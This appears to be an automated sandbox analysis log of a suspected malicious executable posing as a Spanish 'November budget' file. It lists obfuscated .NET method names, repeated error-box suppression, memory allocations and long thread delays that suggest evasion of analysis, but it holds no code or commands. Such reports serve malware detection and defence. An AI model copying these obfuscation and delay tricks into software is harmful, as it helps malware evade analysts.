Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, AjLLXvPnxqDOKZj9sl.cs	High entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, BXlHBTaRVjup4cv1U4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, jo15ypF8Q2d5FhhOFS.cs	High entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, Kc46Hf8ITrxAA4lPXA.cs	High entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, VGK4IuDs0UIkZWMV1c.cs	High entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, rtay8k4GxqYUPWc6TA.cs	High entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, jhecFsQYUfZHa1955Q.cs	High entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	High entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, effcpNldddjUekj7Kr.cs	High entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, lTjvuTj46f0WeeYZxc.cs	High entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, XJe3MayUM75Qt4S8HX.cs	High entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, r2gPona6djD4Y2Uy7Gs.cs	High entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, FbgDLHLo8mv2DHccjX.cs	High entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, nrl7IZhXFOrSCsYjvM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	High entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, HRGrkx7cr8Ehxg8ycc.cs	High entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, OZdrLdz96Gdlyr8xOp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, Exsot2flOn7wu6T8a3.cs	High entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 4F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 9240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: A240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: A450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: B450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: BAB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: CAB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: DAB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 2FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 3120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 5120000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599756	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598711	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598378	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Window / User API: threadDelayed 8233			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Window / User API: threadDelayed 1615			Jump to behavior

